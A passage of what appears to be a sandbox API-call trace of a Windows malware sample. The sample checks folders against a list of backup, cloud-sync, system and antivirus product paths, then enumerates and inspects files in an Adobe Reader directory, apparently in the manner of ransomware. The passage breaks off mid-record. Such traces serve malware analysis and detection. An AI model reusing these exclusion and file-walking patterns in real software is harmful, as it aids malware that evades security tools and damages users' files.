[0058.613] CharUpperBuffW (in: lpsz="\\DEFAULT USER\\", cchLength=0xe | out: lpsz="\\DEFAULT USER\\") returned 0xe [0058.613] CharUpperBuffW (in: lpsz="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\zh_CN\\Services\\", cchLength=0x46 | out: lpsz="C:\\PROGRAM FILES (X86)\\ADOBE\\READER 10.0\\READER\\LOCALE\\ZH_CN\\SERVICES\\") returned 0x46 [0058.613] CharUpperBuffW (in: lpsz="FILES\\ACRONIS\\", cchLength=0xe | out: lpsz="FILES\\ACRONIS\\") returned 0xe [0058.613] CharUpperBuffW (in: lpsz="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\zh_CN\\Services\\", cchLength=0x46 | out: lpsz="C:\\PROGRAM FILES (X86)\\ADOBE\\READER 10.0\\READER\\LOCALE\\ZH_CN\\SERVICES\\") returned 0x46 [0058.613] CharUpperBuffW (in: lpsz="(X86)\\ACRONIS\\", cchLength=0xe | out: lpsz="(X86)\\ACRONIS\\") returned 0xe [0058.613] CharUpperBuffW (in: lpsz="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\zh_CN\\Services\\", cchLength=0x46 | out: lpsz="C:\\PROGRAM FILES (X86)\\ADOBE\\READER 10.0\\READER\\LOCALE\\ZH_CN\\SERVICES\\") returned 0x46 [0058.613] CharUpperBuffW (in: lpsz="FILES\\BACKUPCLIENT\\", cchLength=0x13 | out: lpsz="FILES\\BACKUPCLIENT\\") returned 0x13 [0058.613] CharUpperBuffW (in: lpsz="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\zh_CN\\Services\\", cchLength=0x46 | out: lpsz="C:\\PROGRAM FILES (X86)\\ADOBE\\READER 10.0\\READER\\LOCALE\\ZH_CN\\SERVICES\\") returned 0x46 [0058.613] CharUpperBuffW (in: lpsz="(X86)\\BACKUPCLIENT\\", cchLength=0x13 | out: lpsz="(X86)\\BACKUPCLIENT\\") returned 0x13 [0058.613] CharUpperBuffW (in: lpsz="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\zh_CN\\Services\\", cchLength=0x46 | out: lpsz="C:\\PROGRAM FILES (X86)\\ADOBE\\READER 10.0\\READER\\LOCALE\\ZH_CN\\SERVICES\\") returned 0x46 [0058.613] CharUpperBuffW (in: lpsz="FILES\\BACKUP MANAGER\\", cchLength=0x15 | out: lpsz="FILES\\BACKUP MANAGER\\") returned 0x15 [0058.613] CharUpperBuffW (in: lpsz="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\zh_CN\\Services\\", cchLength=0x46 | out: lpsz="C:\\PROGRAM FILES (X86)\\ADOBE\\READER 10.0\\READER\\LOCALE\\ZH_CN\\SERVICES\\") returned 0x46 [0058.613] CharUpperBuffW (in: lpsz="(X86)\\BACKUP MANAGER\\", cchLength=0x15 | out: lpsz="(X86)\\BACKUP MANAGER\\") returned 0x15 [0058.613] CharUpperBuffW (in: lpsz="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\zh_CN\\Services\\", cchLength=0x46 | out: lpsz="C:\\PROGRAM FILES (X86)\\ADOBE\\READER 10.0\\READER\\LOCALE\\ZH_CN\\SERVICES\\") returned 0x46 [0058.613] CharUpperBuffW (in: lpsz="FILES\\CARBONITE\\", cchLength=0x10 | out: lpsz="FILES\\CARBONITE\\") returned 0x10 [0058.613] CharUpperBuffW (in: lpsz="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\zh_CN\\Services\\", cchLength=0x46 | out: lpsz="C:\\PROGRAM FILES (X86)\\ADOBE\\READER 10.0\\READER\\LOCALE\\ZH_CN\\SERVICES\\") returned 0x46 [0058.613] CharUpperBuffW (in: lpsz="(X86)\\CARBONITE\\", cchLength=0x10 | out: lpsz="(X86)\\CARBONITE\\") returned 0x10 [0058.613] CharUpperBuffW (in: lpsz="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\zh_CN\\Services\\", cchLength=0x46 | out: lpsz="C:\\PROGRAM FILES (X86)\\ADOBE\\READER 10.0\\READER\\LOCALE\\ZH_CN\\SERVICES\\") returned 0x46 [0058.614] CharUpperBuffW (in: lpsz="FILES\\GOOGLE\\DRIVE\\", cchLength=0x13 | out: lpsz="FILES\\GOOGLE\\DRIVE\\") returned 0x13 [0058.614] CharUpperBuffW (in: lpsz="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\zh_CN\\Services\\", cchLength=0x46 | out: lpsz="C:\\PROGRAM FILES (X86)\\ADOBE\\READER 10.0\\READER\\LOCALE\\ZH_CN\\SERVICES\\") returned 0x46 [0058.614] CharUpperBuffW (in: lpsz="(X86)\\GOOGLE\\DRIVE\\", cchLength=0x13 | out: lpsz="(X86)\\GOOGLE\\DRIVE\\") returned 0x13 [0058.614] CharUpperBuffW (in: lpsz="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\zh_CN\\Services\\", cchLength=0x46 | out: lpsz="C:\\PROGRAM FILES (X86)\\ADOBE\\READER 10.0\\READER\\LOCALE\\ZH_CN\\SERVICES\\") returned 0x46 [0058.614] CharUpperBuffW (in: lpsz="FILES\\DROPBOX\\", cchLength=0xe | out: lpsz="FILES\\DROPBOX\\") returned 0xe [0058.614] CharUpperBuffW (in: lpsz="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\zh_CN\\Services\\", cchLength=0x46 | out: lpsz="C:\\PROGRAM FILES (X86)\\ADOBE\\READER 10.0\\READER\\LOCALE\\ZH_CN\\SERVICES\\") returned 0x46 [0058.614] CharUpperBuffW (in: lpsz="(X86)\\DROPBOX\\", cchLength=0xe | out: lpsz="(X86)\\DROPBOX\\") returned 0xe [0058.614] CharUpperBuffW (in: lpsz="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\zh_CN\\Services\\", cchLength=0x46 | out: lpsz="C:\\PROGRAM FILES (X86)\\ADOBE\\READER 10.0\\READER\\LOCALE\\ZH_CN\\SERVICES\\") returned 0x46 [0058.614] CharUpperBuffW (in: lpsz="FILES\\MICROSOFT ONEDRIVE\\", cchLength=0x19 | out: lpsz="FILES\\MICROSOFT ONEDRIVE\\") returned 0x19 [0058.614] CharUpperBuffW (in: lpsz="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\zh_CN\\Services\\", cchLength=0x46 | out: lpsz="C:\\PROGRAM FILES (X86)\\ADOBE\\READER 10.0\\READER\\LOCALE\\ZH_CN\\SERVICES\\") returned 0x46 [0058.614] CharUpperBuffW (in: lpsz="(X86)\\MICROSOFT ONEDRIVE\\", cchLength=0x19 | out: lpsz="(X86)\\MICROSOFT ONEDRIVE\\") returned 0x19 [0058.614] CharUpperBuffW (in: lpsz="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\zh_CN\\Services\\", cchLength=0x46 | out: lpsz="C:\\PROGRAM FILES (X86)\\ADOBE\\READER 10.0\\READER\\LOCALE\\ZH_CN\\SERVICES\\") returned 0x46 [0058.614] CharUpperBuffW (in: lpsz="FILES\\ONEDRIVE\\", cchLength=0xf | out: lpsz="FILES\\ONEDRIVE\\") returned 0xf [0058.614] CharUpperBuffW (in: lpsz="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\zh_CN\\Services\\", cchLength=0x46 | out: lpsz="C:\\PROGRAM FILES (X86)\\ADOBE\\READER 10.0\\READER\\LOCALE\\ZH_CN\\SERVICES\\") returned 0x46 [0058.614] CharUpperBuffW (in: lpsz="(X86)\\ONEDRIVE\\", cchLength=0xf | out: lpsz="(X86)\\ONEDRIVE\\") returned 0xf [0058.614] CharUpperBuffW (in: lpsz="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\zh_CN\\Services\\", cchLength=0x46 | out: lpsz="C:\\PROGRAM FILES (X86)\\ADOBE\\READER 10.0\\READER\\LOCALE\\ZH_CN\\SERVICES\\") returned 0x46 [0058.614] CharUpperBuffW (in: lpsz="VNC\\", cchLength=0x4 | out: lpsz="VNC\\") returned 0x4 [0058.614] CharUpperBuffW (in: lpsz="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\zh_CN\\Services\\", cchLength=0x46 | out: lpsz="C:\\PROGRAM FILES (X86)\\ADOBE\\READER 10.0\\READER\\LOCALE\\ZH_CN\\SERVICES\\") returned 0x46 [0058.614] CharUpperBuffW (in: lpsz="\\INTERNET EXPLORER\\", cchLength=0x13 | out: lpsz="\\INTERNET EXPLORER\\") returned 0x13 [0058.614] CharUpperBuffW (in: lpsz="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\zh_CN\\Services\\", cchLength=0x46 | out: lpsz="C:\\PROGRAM FILES (X86)\\ADOBE\\READER 10.0\\READER\\LOCALE\\ZH_CN\\SERVICES\\") returned 0x46 [0058.614] CharUpperBuffW (in: lpsz="\\MICROSOFT\\OFFICE\\", cchLength=0x12 | out: lpsz="\\MICROSOFT\\OFFICE\\") returned 0x12 [0058.614] CharUpperBuffW (in: lpsz="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\zh_CN\\Services\\", cchLength=0x46 | out: lpsz="C:\\PROGRAM FILES (X86)\\ADOBE\\READER 10.0\\READER\\LOCALE\\ZH_CN\\SERVICES\\") returned 0x46 [0058.614] CharUpperBuffW (in: lpsz="\\MICROSOFT OFFICE\\", cchLength=0x12 | out: lpsz="\\MICROSOFT OFFICE\\") returned 0x12 [0058.614] CharUpperBuffW (in: lpsz="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\zh_CN\\Services\\", cchLength=0x46 | out: lpsz="C:\\PROGRAM FILES (X86)\\ADOBE\\READER 10.0\\READER\\LOCALE\\ZH_CN\\SERVICES\\") returned 0x46 [0058.614] CharUpperBuffW (in: lpsz="\\WINDOWS SIDEBAR\\", cchLength=0x11 | out: lpsz="\\WINDOWS SIDEBAR\\") returned 0x11 [0058.615] CharUpperBuffW (in: lpsz="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\zh_CN\\Services\\", cchLength=0x46 | out: lpsz="C:\\PROGRAM FILES (X86)\\ADOBE\\READER 10.0\\READER\\LOCALE\\ZH_CN\\SERVICES\\") returned 0x46 [0058.615] CharUpperBuffW (in: lpsz="\\WINDOWS MEDIA PLAYER\\", cchLength=0x16 | out: lpsz="\\WINDOWS MEDIA PLAYER\\") returned 0x16 [0058.615] CharUpperBuffW (in: lpsz="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\zh_CN\\Services\\", cchLength=0x46 | out: lpsz="C:\\PROGRAM FILES (X86)\\ADOBE\\READER 10.0\\READER\\LOCALE\\ZH_CN\\SERVICES\\") returned 0x46 [0058.615] CharUpperBuffW (in: lpsz="\\DVD MAKER\\", cchLength=0xb | out: lpsz="\\DVD MAKER\\") returned 0xb [0058.615] CharUpperBuffW (in: lpsz="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\zh_CN\\Services\\", cchLength=0x46 | out: lpsz="C:\\PROGRAM FILES (X86)\\ADOBE\\READER 10.0\\READER\\LOCALE\\ZH_CN\\SERVICES\\") returned 0x46 [0058.615] CharUpperBuffW (in: lpsz="\\WINDOWSPOWERSHELL\\", cchLength=0x13 | out: lpsz="\\WINDOWSPOWERSHELL\\") returned 0x13 [0058.615] CharUpperBuffW (in: lpsz="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\zh_CN\\Services\\", cchLength=0x46 | out: lpsz="C:\\PROGRAM FILES (X86)\\ADOBE\\READER 10.0\\READER\\LOCALE\\ZH_CN\\SERVICES\\") returned 0x46 [0058.615] CharUpperBuffW (in: lpsz="\\WINDOWS DEFENDER\\", cchLength=0x12 | out: lpsz="\\WINDOWS DEFENDER\\") returned 0x12 [0058.615] CharUpperBuffW (in: lpsz="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\zh_CN\\Services\\", cchLength=0x46 | out: lpsz="C:\\PROGRAM FILES (X86)\\ADOBE\\READER 10.0\\READER\\LOCALE\\ZH_CN\\SERVICES\\") returned 0x46 [0058.615] CharUpperBuffW (in: lpsz="\\TOR BROWSER\\", cchLength=0xd | out: lpsz="\\TOR BROWSER\\") returned 0xd [0058.615] CharUpperBuffW (in: lpsz="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\zh_CN\\Services\\", cchLength=0x46 | out: lpsz="C:\\PROGRAM FILES (X86)\\ADOBE\\READER 10.0\\READER\\LOCALE\\ZH_CN\\SERVICES\\") returned 0x46 [0058.615] CharUpperBuffW (in: lpsz="\\ASPNET_CLIENT\\", cchLength=0xf | out: lpsz="\\ASPNET_CLIENT\\") returned 0xf [0058.615] CharUpperBuffW (in: lpsz="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\zh_CN\\Services\\", cchLength=0x46 | out: lpsz="C:\\PROGRAM FILES (X86)\\ADOBE\\READER 10.0\\READER\\LOCALE\\ZH_CN\\SERVICES\\") returned 0x46 [0058.615] CharUpperBuffW (in: lpsz="\\REFERENCE ASSEMBLIES\\", cchLength=0x16 | out: lpsz="\\REFERENCE ASSEMBLIES\\") returned 0x16 [0058.615] CharUpperBuffW (in: lpsz="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\zh_CN\\Services\\", cchLength=0x46 | out: lpsz="C:\\PROGRAM FILES (X86)\\ADOBE\\READER 10.0\\READER\\LOCALE\\ZH_CN\\SERVICES\\") returned 0x46 [0058.615] CharUpperBuffW (in: lpsz="\\MICROSOFT\\PROVISIONING\\", cchLength=0x18 | out: lpsz="\\MICROSOFT\\PROVISIONING\\") returned 0x18 [0058.615] CharUpperBuffW (in: lpsz="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\zh_CN\\Services\\", cchLength=0x46 | out: lpsz="C:\\PROGRAM FILES (X86)\\ADOBE\\READER 10.0\\READER\\LOCALE\\ZH_CN\\SERVICES\\") returned 0x46 [0058.615] CharUpperBuffW (in: lpsz="\\MICROSOFT SILVERLIGHT\\", cchLength=0x17 | out: lpsz="\\MICROSOFT SILVERLIGHT\\") returned 0x17 [0058.615] CharUpperBuffW (in: lpsz="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\zh_CN\\Services\\", cchLength=0x46 | out: lpsz="C:\\PROGRAM FILES (X86)\\ADOBE\\READER 10.0\\READER\\LOCALE\\ZH_CN\\SERVICES\\") returned 0x46 [0058.615] CharUpperBuffW (in: lpsz="\\PROGRAMDATA\\MICROSOFT\\", cchLength=0x17 | out: lpsz="\\PROGRAMDATA\\MICROSOFT\\") returned 0x17 [0058.615] CharUpperBuffW (in: lpsz="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\zh_CN\\Services\\", cchLength=0x46 | out: lpsz="C:\\PROGRAM FILES (X86)\\ADOBE\\READER 10.0\\READER\\LOCALE\\ZH_CN\\SERVICES\\") returned 0x46 [0058.615] CharUpperBuffW (in: lpsz="\\MICROSOFT\\CRYPTO\\", cchLength=0x12 | out: lpsz="\\MICROSOFT\\CRYPTO\\") returned 0x12 [0058.615] CharUpperBuffW (in: lpsz="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\zh_CN\\Services\\", cchLength=0x46 | out: lpsz="C:\\PROGRAM FILES (X86)\\ADOBE\\READER 10.0\\READER\\LOCALE\\ZH_CN\\SERVICES\\") returned 0x46 [0058.616] CharUpperBuffW (in: lpsz="\\WINDOWSAPPS\\", cchLength=0xd | out: lpsz="\\WINDOWSAPPS\\") returned 0xd [0058.616] CharUpperBuffW (in: lpsz="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\zh_CN\\Services\\", cchLength=0x46 | out: lpsz="C:\\PROGRAM FILES (X86)\\ADOBE\\READER 10.0\\READER\\LOCALE\\ZH_CN\\SERVICES\\") returned 0x46 [0058.616] CharUpperBuffW (in: lpsz="\\7-ZIP\\", cchLength=0x7 | out: lpsz="\\7-ZIP\\") returned 0x7 [0058.616] CharUpperBuffW (in: lpsz="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\zh_CN\\Services\\", cchLength=0x46 | out: lpsz="C:\\PROGRAM FILES (X86)\\ADOBE\\READER 10.0\\READER\\LOCALE\\ZH_CN\\SERVICES\\") returned 0x46 [0058.616] CharUpperBuffW (in: lpsz="\\WINRAR\\", cchLength=0x8 | out: lpsz="\\WINRAR\\") returned 0x8 [0058.616] CharUpperBuffW (in: lpsz="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\zh_CN\\Services\\", cchLength=0x46 | out: lpsz="C:\\PROGRAM FILES (X86)\\ADOBE\\READER 10.0\\READER\\LOCALE\\ZH_CN\\SERVICES\\") returned 0x46 [0058.616] CharUpperBuffW (in: lpsz="\\ESET", cchLength=0x5 | out: lpsz="\\ESET") returned 0x5 [0058.616] CharUpperBuffW (in: lpsz="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\zh_CN\\Services\\", cchLength=0x46 | out: lpsz="C:\\PROGRAM FILES (X86)\\ADOBE\\READER 10.0\\READER\\LOCALE\\ZH_CN\\SERVICES\\") returned 0x46 [0058.616] CharUpperBuffW (in: lpsz="\\AVAST", cchLength=0x6 | out: lpsz="\\AVAST") returned 0x6 [0058.616] CharUpperBuffW (in: lpsz="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\zh_CN\\Services\\", cchLength=0x46 | out: lpsz="C:\\PROGRAM FILES (X86)\\ADOBE\\READER 10.0\\READER\\LOCALE\\ZH_CN\\SERVICES\\") returned 0x46 [0058.616] CharUpperBuffW (in: lpsz="\\MALWAREBYTES", cchLength=0xd | out: lpsz="\\MALWAREBYTES") returned 0xd [0058.616] CharUpperBuffW (in: lpsz="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\zh_CN\\Services\\", cchLength=0x46 | out: lpsz="C:\\PROGRAM FILES (X86)\\ADOBE\\READER 10.0\\READER\\LOCALE\\ZH_CN\\SERVICES\\") returned 0x46 [0058.616] CharUpperBuffW (in: lpsz="\\SYMANTEC ENDPOINT", cchLength=0x12 | out: lpsz="\\SYMANTEC ENDPOINT") returned 0x12 [0058.616] CharUpperBuffW (in: lpsz="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\zh_CN\\Services\\", cchLength=0x46 | out: lpsz="C:\\PROGRAM FILES (X86)\\ADOBE\\READER 10.0\\READER\\LOCALE\\ZH_CN\\SERVICES\\") returned 0x46 [0058.616] CharUpperBuffW (in: lpsz="\\TREND MICRO", cchLength=0xc | out: lpsz="\\TREND MICRO") returned 0xc [0058.616] CharUpperBuffW (in: lpsz="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\zh_CN\\Services\\", cchLength=0x46 | out: lpsz="C:\\PROGRAM FILES (X86)\\ADOBE\\READER 10.0\\READER\\LOCALE\\ZH_CN\\SERVICES\\") returned 0x46 [0058.616] CharUpperBuffW (in: lpsz="\\BITDEFENDER", cchLength=0xc | out: lpsz="\\BITDEFENDER") returned 0xc [0058.616] CharUpperBuffW (in: lpsz="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\zh_CN\\Services\\", cchLength=0x46 | out: lpsz="C:\\PROGRAM FILES (X86)\\ADOBE\\READER 10.0\\READER\\LOCALE\\ZH_CN\\SERVICES\\") returned 0x46 [0058.616] CharUpperBuffW (in: lpsz="\\PANDA SECURITY", cchLength=0xf | out: lpsz="\\PANDA SECURITY") returned 0xf [0058.616] CharUpperBuffW (in: lpsz="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\zh_CN\\Services\\", cchLength=0x46 | out: lpsz="C:\\PROGRAM FILES (X86)\\ADOBE\\READER 10.0\\READER\\LOCALE\\ZH_CN\\SERVICES\\") returned 0x46 [0058.616] CharUpperBuffW (in: lpsz="\\MCAFEE", cchLength=0x7 | out: lpsz="\\MCAFEE") returned 0x7 [0058.616] CharUpperBuffW (in: lpsz="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\zh_CN\\Services\\", cchLength=0x46 | out: lpsz="C:\\PROGRAM FILES (X86)\\ADOBE\\READER 10.0\\READER\\LOCALE\\ZH_CN\\SERVICES\\") returned 0x46 [0058.616] CharUpperBuffW (in: lpsz="\\KASPERSKY LAB", cchLength=0xe | out: lpsz="\\KASPERSKY LAB") returned 0xe [0058.617] CharUpperBuffW (in: lpsz="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\zh_CN\\Services\\", cchLength=0x46 | out: lpsz="C:\\PROGRAM FILES (X86)\\ADOBE\\READER 10.0\\READER\\LOCALE\\ZH_CN\\SERVICES\\") returned 0x46 [0058.617] CharUpperBuffW (in: lpsz="\\KASPERSKYLAB", cchLength=0xd | out: lpsz="\\KASPERSKYLAB") returned 0xd [0058.617] CharUpperBuffW (in: lpsz="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\zh_CN\\Services\\", cchLength=0x46 | out: lpsz="C:\\PROGRAM FILES (X86)\\ADOBE\\READER 10.0\\READER\\LOCALE\\ZH_CN\\SERVICES\\") returned 0x46 [0058.617] CharUpperBuffW (in: lpsz="\\AVDEFENDER", cchLength=0xb | out: lpsz="\\AVDEFENDER") returned 0xb [0058.617] CharUpperBuffW (in: lpsz="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\zh_CN\\Services\\", cchLength=0x46 | out: lpsz="C:\\PROGRAM FILES (X86)\\ADOBE\\READER 10.0\\READER\\LOCALE\\ZH_CN\\SERVICES\\") returned 0x46 [0058.617] CharUpperBuffW (in: lpsz="\\SOPHOS", cchLength=0x7 | out: lpsz="\\SOPHOS") returned 0x7 [0058.617] CharUpperBuffW (in: lpsz="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\zh_CN\\Services\\", cchLength=0x46 | out: lpsz="C:\\PROGRAM FILES (X86)\\ADOBE\\READER 10.0\\READER\\LOCALE\\ZH_CN\\SERVICES\\") returned 0x46 [0058.617] CharUpperBuffW (in: lpsz="\\AVG", cchLength=0x4 | out: lpsz="\\AVG") returned 0x4 [0058.617] CharUpperBuffW (in: lpsz="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\zh_CN\\Services\\", cchLength=0x46 | out: lpsz="C:\\PROGRAM FILES (X86)\\ADOBE\\READER 10.0\\READER\\LOCALE\\ZH_CN\\SERVICES\\") returned 0x46 [0058.617] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\zh_CN\\Services\\*.*", lpFindFileData=0x18e464 | out: lpFindFileData=0x18e464*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x81f4af00, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x81f971c0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x81f971c0, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x69aa40 [0058.618] FindNextFileW (in: hFindFile=0x69aa40, lpFindFileData=0x18e464 | out: lpFindFileData=0x18e464*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x81f4af00, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x81f971c0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x81f971c0, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0058.618] FindNextFileW (in: hFindFile=0x69aa40, lpFindFileData=0x18e464 | out: lpFindFileData=0x18e464*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x99d45400, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x81f971c0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x99d45400, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x899d, dwReserved0=0x0, dwReserved1=0x0, cFileName="DEXShare.asfx", cAlternateFileName="DEXSHA~1.ASF")) returned 1 [0058.618] CharUpperBuffW (in: lpsz=".asfx", cchLength=0x5 | out: lpsz=".ASFX") returned 0x5 [0058.618] CharUpperBuffW (in: lpsz="DEXShare.asfx", cchLength=0xd | out: lpsz="DEXSHARE.ASFX") returned 0xd [0058.618] FindNextFileW (in: hFindFile=0x69aa40, lpFindFileData=0x18e464 | out: lpFindFileData=0x18e464*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x99d45400, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x81f4af00, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x99d45400, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0xe4, dwReserved0=0x0, dwReserved1=0x0, cFileName="Services.asfx", cAlternateFileName="SERVIC~1.ASF")) returned 1 [0058.618] CharUpperBuffW (in: lpsz=".asfx", cchLength=0x5 | out: lpsz=".ASFX") returned 0x5 [0058.618] CharUpperBuffW (in: lpsz="Services.asfx", cchLength=0xd | out: lpsz="SERVICES.ASFX") returned 0xd [0058.618] FindNextFileW (in: hFindFile=0x69aa40, lpFindFileData=0x18e464 | out: lpFindFileData=0x18e464*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x99d45400, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x81f4af00, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x99d45400, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0xe4, dwReserved0=0x0, dwReserved1=0x0, cFileName="Services.asfx", cAlternateFileName="SERVIC~1.ASF")) returned 0 [0058.619] FindClose (in: hFindFile=0x69aa40 | out: hFindFile=0x69aa40) returned 1 [0058.619] FindNextFileW (in: hFindFile=0x69aa00, lpFindFileData=0x18e754 | out: lpFindFileData=0x18e754*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x99d45400, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x7dc7e5a0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x99d45400, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x2000, dwReserved0=0x0, dwReserved1=0x0, cFileName="Spelling.CHS", cAlternateFileName="")) returned 1 [0058.619] CharUpperBuffW (in: lpsz=".CHS", cchLength=0x4 | out: lpsz=".CHS") returned 0x4 [0058.619] CharUpperBuffW (in: lpsz="Spelling.CHS", cchLength=0xc | out: lpsz="SPELLING.CHS") returned 0xc [0058.619] FindNextFileW (in: hFindFile=0x69aa00, lpFindFileData=0x18e754 | out: lpFindFileData=0x18e754*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x99d45400, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x7f498460, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x99d45400, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x1e00, dwReserved0=0x0, dwReserved1=0x0, cFileName="updater.CHS", cAlternateFileName="")) returned 1 [0058.619] CharUpperBuffW (in: lpsz=".CHS", cchLength=0x4 | out: lpsz=".CHS") returned 0x4 [0058.619] CharUpperBuffW (in: lpsz="updater.CHS", cchLength=0xb | out: lpsz="UPDATER.CHS") returned 0xb [0058.619] FindNextFileW (in: hFindFile=0x69aa00, lpFindFileData=0x18e754 | out: lpFindFileData=0x18e754*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x99d45400, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x82d93300, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x99d45400, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x4e00, dwReserved0=0x0, dwReserved1=0x0, cFileName="Weblink.CHS", cAlternateFileName="")) returned 1 [0058.619] CharUpperBuffW (in: lpsz=".CHS", cchLength=0x4 | out: lpsz=".CHS") returned 0x4 [0058.619] CharUpperBuffW (in: lpsz="Weblink.CHS", cchLength=0xb | out: lpsz="WEBLINK.CHS") returned 0xb [0058.619] FindNextFileW (in: hFindFile=0x69aa00, lpFindFileData=0x18e754 | out: lpFindFileData=0x18e754*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x99d45400, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x82d93300, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x99d45400, 